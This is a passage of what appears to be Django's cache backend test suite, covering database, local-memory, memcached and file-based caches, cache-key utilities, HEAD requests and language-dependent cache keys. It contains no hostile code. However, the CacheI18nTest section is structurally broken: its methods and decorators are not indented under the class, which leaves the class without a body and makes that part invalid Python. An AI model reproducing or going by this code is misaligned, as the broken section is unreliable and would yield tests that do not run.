            # Quote the name — it deliberately contains spaces.
            table_name = connection.ops.quote_name('test cache table')
            cursor.execute('DROP TABLE %s' % table_name)

    def test_zero_cull(self):
        # Exercise the cull path of the 'zero_cull' cache alias (its
        # configuration lives elsewhere in this module).
        self._perform_cull_test(caches['zero_cull'], 50, 18)

    def test_second_call_doesnt_crash(self):
        # Re-running createcachetable over existing tables must be a no-op
        # that only reports the tables as already existing.
        out = six.StringIO()
        management.call_command('createcachetable', stdout=out)
        self.assertEqual(out.getvalue(),
            "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))

    @override_settings(CACHES=caches_setting_for_tests(
        BACKEND='django.core.cache.backends.db.DatabaseCache',
        # Use another table name to avoid the 'table already exists' message.
        LOCATION='createcachetable_dry_run_mode'
    ))
    def test_createcachetable_dry_run_mode(self):
        # --dry-run prints the SQL instead of executing it.
        out = six.StringIO()
        management.call_command('createcachetable', dry_run=True, stdout=out)
        output = out.getvalue()
        self.assertTrue(output.startswith("CREATE TABLE"))

    def test_createcachetable_with_table_argument(self):
        """
        Delete and recreate cache table with legacy behavior (explicitly
        specifying the table name).
        """
        self.drop_table()
        out = six.StringIO()
        management.call_command(
            'createcachetable',
            'test cache table',
            verbosity=2,
            stdout=out,
        )
        self.assertEqual(out.getvalue(),
            "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
    # Re-run the entire DB cache suite with USE_TZ enabled (timezone-aware
    # datetimes in the expiry column).
    pass
class DBCacheRouter(object):
    """A router that puts the cache table on the 'other' database."""

    def db_for_read(self, model, **hints):
        # Route reads of the cache model to 'other'; no opinion otherwise.
        return 'other' if model._meta.app_label == 'django_cache' else None

    def db_for_write(self, model, **hints):
        # Writes are routed the same way as reads.
        return 'other' if model._meta.app_label == 'django_cache' else None

    def allow_migrate(self, db, app_label, **hints):
        # Only migrate the cache app on 'other'; defer for everything else.
        if app_label == 'django_cache':
            return db == 'other'
        return None
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
            'LOCATION': 'my_cache_table',
        },
    },
)
class CreateCacheTableForDBCacheTests(TestCase):
    """createcachetable must respect database routers in a multi-db setup."""

    multi_db = True

    @override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
    def test_createcachetable_observes_database_router(self):
        # cache table should not be created on 'default'
        with self.assertNumQueries(0, using='default'):
            management.call_command('createcachetable',
                                    database='default',
                                    verbosity=0, interactive=False)
        # cache table should be created on 'other'
        # Queries:
        #   1: check table doesn't already exist
        #   2: create savepoint (if transactional DDL is supported)
        #   3: create the table
        #   4: create the index
        #   5: release savepoint (if transactional DDL is supported)
        num = 5 if connections['other'].features.can_rollback_ddl else 3
        with self.assertNumQueries(num, using='other'):
            management.call_command('createcachetable',
                                    database='other',
                                    verbosity=0, interactive=False)
class PicklingSideEffect(object):
    """Helper whose pickling records whether the given cache's lock was
    write-held at pickle time. Used by test_locking_on_pickle."""

    def __init__(self, cache):
        self.cache = cache   # the cache whose lock state we observe
        self.locked = False  # set to True if pickling happened under the lock

    def __getstate__(self):
        # Called when the cache pickles this object for storage. If the
        # cache's lock has active writers at that moment, remember it.
        # NOTE(review): relies on the locmem backend's private
        # `_lock.active_writers` attribute — verify against the backend.
        if self.cache._lock.active_writers:
            self.locked = True
        # Deliberately discard all state for the pickled copy.
        return {}
@override_settings(CACHES=caches_setting_for_tests(
    BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
    """Run the shared cache suite against the local-memory backend, plus
    locmem-specific isolation, locking, and expiry tests."""

    def setUp(self):
        super(LocMemCacheTests, self).setUp()

        # LocMem requires a hack to make the other caches
        # share a data store with the 'normal' cache: point each alias's
        # private store and expiry map at the default cache's objects.
        caches['prefix']._cache = cache._cache
        caches['prefix']._expire_info = cache._expire_info

        caches['v2']._cache = cache._cache
        caches['v2']._expire_info = cache._expire_info

        caches['custom_key']._cache = cache._cache
        caches['custom_key']._expire_info = cache._expire_info

        caches['custom_key2']._cache = cache._cache
        caches['custom_key2']._expire_info = cache._expire_info

    @override_settings(CACHES={
        'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
        'other': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'LOCATION': 'other'
        },
    })
    def test_multiple_caches(self):
        "Check that multiple locmem caches are isolated"
        cache.set('value', 42)
        self.assertEqual(caches['default'].get('value'), 42)
        self.assertIsNone(caches['other'].get('value'))

    def test_locking_on_pickle(self):
        """#20613/#18541 -- Ensures pickling is done outside of the lock."""
        bad_obj = PicklingSideEffect(cache)
        cache.set('set', bad_obj)
        self.assertFalse(bad_obj.locked, "Cache was locked during pickling")

        cache.add('add', bad_obj)
        self.assertFalse(bad_obj.locked, "Cache was locked during pickling")

    def test_incr_decr_timeout(self):
        """incr/decr does not modify expiry time (matches memcached behavior)"""
        key = 'value'
        _key = cache.make_key(key)
        cache.set(key, 1, timeout=cache.default_timeout * 10)
        expire = cache._expire_info[_key]
        cache.incr(key)
        self.assertEqual(expire, cache._expire_info[_key])
        cache.decr(key)
        self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
# Probe settings for a memcached-backed cache; if several are configured,
# the last matching one wins. The skipUnless decorators below use this
# as the availability check.
for _cache_params in settings.CACHES.values():
    if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
        memcached_params = _cache_params

# Variants of the memcached settings used to test TIMEOUT handling.
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000  # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
    """Run the shared cache suite against a live memcached server.

    Skipped entirely when no memcached backend is configured in the
    test settings (see the memcached_params probe above).
    """

    def test_invalid_keys(self):
        """
        On memcached, we don't introduce a duplicate key validation
        step (for speed reasons), we just let the memcached API
        library raise its own exception on bad keys. Refs #6447.

        In order to be memcached-API-library agnostic, we only assert
        that a generic exception of some kind is raised.
        """
        # memcached does not allow whitespace or control characters in keys
        self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
        # memcached limits key length to 250
        self.assertRaises(Exception, cache.set, 'a' * 251, 'value')

    # Explicitly display a skipped test if no configured cache uses MemcachedCache
    @unittest.skipUnless(
        memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
        "cache with python-memcached library not available")
    def test_memcached_uses_highest_pickle_version(self):
        # Regression test for #19810
        for cache_key, cache_config in settings.CACHES.items():
            if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
                self.assertEqual(caches[cache_key]._cache.pickleProtocol,
                                 pickle.HIGHEST_PROTOCOL)

    @override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
    def test_default_never_expiring_timeout(self):
        # Regression test for #22845
        cache.set('infinite_foo', 'bar')
        self.assertEqual(cache.get('infinite_foo'), 'bar')

    @override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
    def test_default_far_future_timeout(self):
        # Regression test for #22845
        cache.set('future_foo', 'bar')
        self.assertEqual(cache.get('future_foo'), 'bar')

    def test_cull(self):
        # culling isn't implemented, memcached deals with it.
        pass

    def test_zero_cull(self):
        # culling isn't implemented, memcached deals with it.
        pass

    def test_memcached_deletes_key_on_failed_set(self):
        # By default memcached allows objects up to 1MB. For the cache_db session
        # backend to always use the current session, memcached needs to delete
        # the old key if it fails to set.
        # pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
        # tell from a quick check of its source code. This is falling back to
        # the default value exposed by python-memcached on my system.
        max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)

        cache.set('small_value', 'a')
        self.assertEqual(cache.get('small_value'), 'a')

        large_value = 'a' * (max_value_length + 1)
        cache.set('small_value', large_value)
        # small_value should be deleted, or set if configured to accept larger values
        value = cache.get('small_value')
        self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
    BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
    """
    Specific test cases for the file-based cache.
    """

    def setUp(self):
        super(FileBasedCacheTests, self).setUp()
        self.dirname = tempfile.mkdtemp()
        # Caches location cannot be modified through override_settings / modify_settings,
        # hence settings are manipulated directly here and the setting_changed signal
        # is triggered manually.
        for cache_params in settings.CACHES.values():
            cache_params.update({'LOCATION': self.dirname})
        setting_changed.send(self.__class__, setting='CACHES', enter=False)

    def tearDown(self):
        super(FileBasedCacheTests, self).tearDown()
        # Call parent first, as cache.clear() may recreate cache base directory
        shutil.rmtree(self.dirname)

    def test_ignores_non_cache_files(self):
        """clear() must leave unrelated files in the cache dir untouched."""
        fname = os.path.join(self.dirname, 'not-a-cache-file')
        with open(fname, 'w'):
            os.utime(fname, None)
        cache.clear()
        self.assertTrue(os.path.exists(fname),
                        'Expected cache.clear to ignore non cache files')
        os.remove(fname)

    def test_clear_does_not_remove_cache_dir(self):
        cache.clear()
        self.assertTrue(os.path.exists(self.dirname),
                        'Expected cache.clear to keep the cache dir')

    def test_creates_cache_dir_if_nonexistent(self):
        """set() recreates the cache directory if it has been removed."""
        os.rmdir(self.dirname)
        cache.set('foo', 'bar')
        # Bug fix: the original called os.path.exists() without asserting on
        # its result, so this test could never fail. Assert it explicitly.
        self.assertTrue(os.path.exists(self.dirname))

    def test_cache_write_unpicklable_type(self):
        # This fails if not using the highest pickling protocol on Python 2.
        cache.set('unpicklable', UnpicklableType())
@override_settings(CACHES={
    'default': {
        'BACKEND': 'cache.liberal_backend.CacheClass',
    },
})
class CustomCacheKeyValidationTests(SimpleTestCase):
    """
    Tests for the ability to mixin a custom ``validate_key`` method to
    a custom cache backend that otherwise inherits from a builtin
    backend, and override the default key validation. Refs #6447.
    """

    def test_custom_key_validation(self):
        # this key is both longer than 250 characters, and has spaces
        key = 'some key with spaces' * 15
        val = 'a value'
        # The liberal backend's validate_key accepts it, so the round
        # trip succeeds where the default validation would complain.
        cache.set(key, val)
        self.assertEqual(cache.get(key), val)
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'cache.closeable_cache.CacheClass',
        }
    }
)
class CacheClosingTests(SimpleTestCase):
    """The cache backend's close() hook runs when a request finishes."""

    def test_close(self):
        self.assertFalse(cache.closed)
        # Sending request_finished should result in the cache being closed.
        signals.request_finished.send(self.__class__)
        self.assertTrue(cache.closed)
# Minimal local-memory cache configuration used by the default-timeout
# tests below (DefaultNonExpiringCacheKeyTests).
DEFAULT_MEMORY_CACHES_SETTINGS = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': 'unique-snowflake',
    }
}
# The same configuration with TIMEOUT explicitly None ("never expire").
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
    """Tests that verify that settings having Cache arguments with a TIMEOUT
    set to `None` will create Caches that will set non-expiring keys.

    This fixes ticket #22085.
    """

    def setUp(self):
        # The 5 minute (300 seconds) default expiration time for keys is
        # defined in the implementation of the initializer method of the
        # BaseCache type.
        self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout

    def tearDown(self):
        # `del` is a statement, not a function — no parentheses needed.
        del self.DEFAULT_TIMEOUT

    def test_default_expiration_time_for_keys_is_5_minutes(self):
        """The default expiration time of a cache key is 5 minutes.

        This value is defined inside the __init__() method of the
        :class:`django.core.cache.backends.base.BaseCache` type.
        """
        self.assertEqual(300, self.DEFAULT_TIMEOUT)

    def test_caches_with_unset_timeout_has_correct_default_timeout(self):
        """Caches that have the TIMEOUT parameter undefined in the default
        settings will use the default 5 minute timeout.
        """
        cache = caches[DEFAULT_CACHE_ALIAS]
        self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)

    @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
        """Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings with have `None` as the default timeout.

        This means "no timeout".
        """
        cache = caches[DEFAULT_CACHE_ALIAS]
        self.assertIsNone(cache.default_timeout)
        self.assertIsNone(cache.get_backend_timeout())

    @override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
    def test_caches_with_unset_timeout_set_expiring_key(self):
        """Memory caches that have the TIMEOUT parameter unset will set cache
        keys having the default 5 minute timeout.
        """
        key = "my-key"
        value = "my-value"
        cache = caches[DEFAULT_CACHE_ALIAS]
        cache.set(key, value)
        cache_key = cache.make_key(key)
        self.assertIsNotNone(cache._expire_info[cache_key])

    @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
        """Memory caches that have the TIMEOUT parameter set to `None` will set
        a non expiring key by default.
        """
        # Bug fix: this method was named "text_caches_..." so unittest test
        # discovery never ran it; renamed to "test_..." so it executes.
        key = "another-key"
        value = "another-value"
        cache = caches[DEFAULT_CACHE_ALIAS]
        cache.set(key, value)
        cache_key = cache.make_key(key)
        self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHE_MIDDLEWARE_SECONDS=1,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    USE_I18N=False,
)
class CacheUtils(SimpleTestCase):
    """TestCase for django.utils.cache functions."""

    def setUp(self):
        self.host = 'www.example.com'
        self.path = '/cache/test/'
        self.factory = RequestFactory(HTTP_HOST=self.host)

    def tearDown(self):
        cache.clear()

    def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
        # Build a request via self._get_request (defined elsewhere) and
        # mark it for cache updating.
        request = self._get_request(self.host, self.path,
                                    method, query_string=query_string)
        # NOTE(review): a falsy `update_cache` argument still yields True
        # here — presumably intended only as a default; confirm before
        # relying on passing False.
        request._cache_update_cache = True if not update_cache else update_cache
        return request

    def _set_cache(self, request, msg):
        # Push a response with body `msg` through the cache-update middleware.
        response = HttpResponse()
        response.content = msg
        return UpdateCacheMiddleware().process_response(request, response)

    def test_patch_vary_headers(self):
        """patch_vary_headers() merges new header names into Vary,
        treating names case-insensitively and preserving order."""
        headers = (
            # Initial vary, new headers, resulting vary.
            (None, ('Accept-Encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
            ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            ('Cookie    ,     Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
        )
        for initial_vary, newheaders, resulting_vary in headers:
            response = HttpResponse()
            if initial_vary is not None:
                response['Vary'] = initial_vary
            patch_vary_headers(response, newheaders)
            self.assertEqual(response['Vary'], resulting_vary)

    def test_get_cache_key(self):
        """get_cache_key() returns None until learn_cache_key() has run,
        then produces a stable, prefix-aware key."""
        request = self.factory.get(self.path)
        response = HttpResponse()
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)

        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )
        # Verify that a specified key_prefix is taken into account.
        key_prefix = 'localprefix'
        learn_cache_key(request, response, key_prefix=key_prefix)
        self.assertEqual(
            get_cache_key(request, key_prefix=key_prefix),
            'views.decorators.cache.cache_page.localprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_get_cache_key_with_query(self):
        """The query string is part of the cache key."""
        request = self.factory.get(self.path, {'test': 1})
        response = HttpResponse()
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)
        # Verify that the querystring is taken into account.
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_cache_key_varies_by_url(self):
        """
        get_cache_key keys differ by fully-qualified URL instead of path
        """
        request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
        learn_cache_key(request1, HttpResponse())
        request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
        learn_cache_key(request2, HttpResponse())
        self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))

    def test_learn_cache_key(self):
        """learn_cache_key() folds the response's Vary headers into the key."""
        request = self.factory.head(self.path)
        response = HttpResponse()
        response['Vary'] = 'Pony'
        # Make sure that the Vary header is added to the key hash
        learn_cache_key(request, response)

        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_patch_cache_control(self):
        """patch_cache_control() merges directives, keeping private/public
        mutually exclusive."""
        tests = (
            # Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
            (None, {'private': True}, {'private'}),
            ('', {'private': True}, {'private'}),
            # Test whether private/public attributes are mutually exclusive
            ('private', {'private': True}, {'private'}),
            ('private', {'public': True}, {'public'}),
            ('public', {'public': True}, {'public'}),
            ('public', {'private': True}, {'private'}),
            ('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
            ('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
            ('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
        )

        cc_delim_re = re.compile(r'\s*,\s*')

        for initial_cc, newheaders, expected_cc in tests:
            response = HttpResponse()
            if initial_cc is not None:
                response['Cache-Control'] = initial_cc
            patch_cache_control(response, **newheaders)
            parts = set(cc_delim_re.split(response['Cache-Control']))
            self.assertEqual(parts, expected_cc)
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'KEY_PREFIX': 'cacheprefix',
        },
    },
)
class PrefixedCacheUtils(CacheUtils):
    # Re-run all CacheUtils tests with a KEY_PREFIX configured on the
    # default cache.
    pass
@override_settings(
    CACHE_MIDDLEWARE_SECONDS=60,
    CACHE_MIDDLEWARE_KEY_PREFIX='test',
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
)
class CacheHEADTest(SimpleTestCase):
    """HEAD requests interact correctly with the cache middleware."""

    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def _set_cache(self, request, msg):
        # Run a response with body `msg` through the cache-update middleware.
        response = HttpResponse()
        response.content = msg
        return UpdateCacheMiddleware().process_response(request, response)

    def test_head_caches_correctly(self):
        """A cached HEAD response is served to subsequent HEAD requests."""
        test_content = 'test content'

        request = self.factory.head(self.path)
        request._cache_update_cache = True
        self._set_cache(request, test_content)

        request = self.factory.head(self.path)
        request._cache_update_cache = True
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(test_content.encode(), get_cache_data.content)

    def test_head_with_cached_get(self):
        """A HEAD request is served from a previously cached GET response."""
        test_content = 'test content'

        request = self.factory.get(self.path)
        request._cache_update_cache = True
        self._set_cache(request, test_content)

        request = self.factory.head(self.path)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
    # A fixed request path plus a factory for building test requests.
    self.path = '/cache/test/'
    self.factory = RequestFactory()
def tearDown(self):
    # Drop all cached entries so the i18n tests stay independent.
    cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
    """With USE_I18N, the active language appears in the cache key, and
    learn_cache_key/get_cache_key agree on the resulting key."""
    request = self.factory.get(self.path)
    lang = translation.get_language()
    response = HttpResponse()
    key = learn_cache_key(request, response)
    self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
    key2 = get_cache_key(request)
    self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
    """Assert that a request with the given Accept-Language header and a
    response with the given Vary header produce exactly ``reference_key``
    from both learn_cache_key() and get_cache_key()."""
    request = self.factory.get(self.path)
    request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
    request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
    response = HttpResponse()
    response['Vary'] = vary
    key = learn_cache_key(request, response)
    key2 = get_cache_key(request)
    self.assertEqual(key, reference_key)
    self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
    """The cache key stays stable across equivalent Accept-Language values
    and different orderings/spellings of the Vary header."""
    lang = translation.get_language()
    self.assertEqual(lang, 'en')
    request = self.factory.get(self.path)
    request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
    response = HttpResponse()
    response['Vary'] = 'accept-encoding'
    key = learn_cache_key(request, response)
    self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
    # All of the following must map to the same key as above, regardless
    # of Accept-Language spelling or Vary header ordering/case.
    self.check_accept_language_vary(
        'en-us',
        'cookie, accept-language, accept-encoding',
        key
    )
    self.check_accept_language_vary(
        'en-US',
        'cookie, accept-encoding, accept-language',
        key
    )
    self.check_accept_language_vary(
        'en-US,en;q=0.8',
        'accept-encoding, accept-language, cookie',
        key
    )
    self.check_accept_language_vary(
        'en-US,en;q=0.8,ko;q=0.6',
        'accept-language, cookie, accept-encoding',
        key
    )
    self.check_accept_language_vary(
        'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
        'accept-encoding, cookie, accept-language',
        key
    )
    self.check_accept_language_vary(
        'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
        'accept-language, accept-encoding, cookie',
        key
    )
    self.check_accept_language_vary(
        'ko;q=1.0,en;q=0.5',
        'cookie, accept-language, accept-encoding',
        key
    )
    self.check_accept_language_vary(
        'ko, en',
        'cookie, accept-encoding, accept-language',
        key
    )
    self.check_accept_language_vary(
        'ko-KR, en-US',
        'accept-encoding, accept-language, cookie',
        key
    )
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
    """With USE_L10N (and USE_I18N off), the language still appears in
    the cache key because localized formatting depends on it."""
    request = self.factory.get(self.path)
    lang = translation.get_language()
    response = HttpResponse()
    key = learn_cache_key(request, response)
    self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
    key2 = get_cache_key(request)
    self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
    """With USE_TZ, the (sanitized) time zone name is part of the key."""
    request = self.factory.get(self.path)
    # This is tightly coupled to the implementation,
    # but it's the most straightforward way to test the key.
    tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
    tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
    response = HttpResponse()
    key = learn_cache_key(request, response)
    self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
    key2 = get_cache_key(request)
    self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
    """With i18n and l10n disabled, neither the language nor the time
    zone name leaks into the cache key."""
    request = self.factory.get(self.path)
    lang = translation.get_language()
    tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
    tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
    response = HttpResponse()
    key = learn_cache_key(request, response)
    self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
    self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
    # Regression test for #17476: non-ASCII characters in the time zone
    # name must be stripped, not crash key generation. Works for both a
    # bytes and a unicode zone name.
    class CustomTzName(timezone.UTC):
        name = ''

        def tzname(self, dt):
            return self.name

    request = self.factory.get(self.path)
    response = HttpResponse()
    with timezone.override(CustomTzName()):
        CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8')  # UTF-8 string
        sanitized_name = 'Hora_estndar_de_Argentina'
        self.assertIn(sanitized_name, learn_cache_key(request, response),
                      "Cache keys should include the time zone name when time zones are active")

        CustomTzName.name = 'Hora estándar de Argentina'    # unicode
        sanitized_name = 'Hora_estndar_de_Argentina'
        self.assertIn(sanitized_name, learn_cache_key(request, response),
                      "Cache keys should include the time zone name when time zones are active")
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX="test",
    CACHE_MIDDLEWARE_SECONDS=60,
    USE_ETAGS=True,
    USE_I18N=True,
)
def test_middleware(self):
    """End-to-end check of Update/FetchFromCacheMiddleware: query-string
    handling, i18n-aware cache keys, and the USE_ETAGS toggle."""
    def set_cache(request, lang, msg):
        # Render a response in the given language and push it through the
        # update-cache middleware so it lands in the cache.
        translation.activate(lang)
        response = HttpResponse()
        response.content = msg
        return UpdateCacheMiddleware().process_response(request, response)
    # cache with non empty request.GET
    request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
    request._cache_update_cache = True
    get_cache_data = FetchFromCacheMiddleware().process_request(request)
    # first access, cache must return None
    self.assertIsNone(get_cache_data)
    response = HttpResponse()
    content = 'Check for cache with QUERY_STRING'
    response.content = content
    UpdateCacheMiddleware().process_response(request, response)
    get_cache_data = FetchFromCacheMiddleware().process_request(request)
    # cache must return content
    self.assertIsNotNone(get_cache_data)
    self.assertEqual(get_cache_data.content, content.encode())
    # different QUERY_STRING, cache must be empty
    request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
    request._cache_update_cache = True
    get_cache_data = FetchFromCacheMiddleware().process_request(request)
    self.assertIsNone(get_cache_data)
    # i18n tests
    en_message = "Hello world!"
    es_message = "Hola mundo!"
    request = self.factory.get(self.path)
    request._cache_update_cache = True
    set_cache(request, 'en', en_message)
    get_cache_data = FetchFromCacheMiddleware().process_request(request)
    # Check that we can recover the cache
    self.assertIsNotNone(get_cache_data)
    self.assertEqual(get_cache_data.content, en_message.encode())
    # Check that we use etags
    self.assertTrue(get_cache_data.has_header('ETag'))
    # Check that we can disable etags
    with self.settings(USE_ETAGS=False):
        request._cache_update_cache = True
        set_cache(request, 'en', en_message)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertFalse(get_cache_data.has_header('ETag'))
    # change the session language and set content
    request = self.factory.get(self.path)
    request._cache_update_cache = True
    set_cache(request, 'es', es_message)
    # change again the language
    translation.activate('en')
    # retrieve the content from cache: the key is language-dependent, so the
    # English entry cached earlier is served while 'en' is active.
    get_cache_data = FetchFromCacheMiddleware().process_request(request)
    self.assertEqual(get_cache_data.content, en_message.encode())
    # change again the language
    translation.activate('es')
    get_cache_data = FetchFromCacheMiddleware().process_request(request)
    self.assertEqual(get_cache_data.content, es_message.encode())
    # reset the language
    translation.deactivate()
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX="test",
    CACHE_MIDDLEWARE_SECONDS=60,
    USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
    """Streaming responses must never be stored by the cache middleware."""
    request = self.factory.get(self.path)
    get_cache_data = FetchFromCacheMiddleware().process_request(request)
    self.assertIsNone(get_cache_data)
    # This test passes on Python < 3.3 even without the corresponding code
    # in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
    # fails (http://bugs.python.org/issue14288). LocMemCache silently
    # swallows the exception and doesn't store the response in cache.
    content = ['Check for cache with streaming content.']
    response = StreamingHttpResponse(content)
    UpdateCacheMiddleware().process_response(request, response)
    # A second fetch must still miss: nothing was cached.
    get_cache_data = FetchFromCacheMiddleware().process_request(request)
    self.assertIsNone(get_cache_data)
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'KEY_PREFIX': 'cacheprefix'
        },
    },
)
class PrefixedCacheI18nTest(CacheI18nTest):
    """Re-run the inherited i18n cache-key tests with a KEY_PREFIX configured
    on the default cache backend."""
    pass
def hello_world_view(request, value):
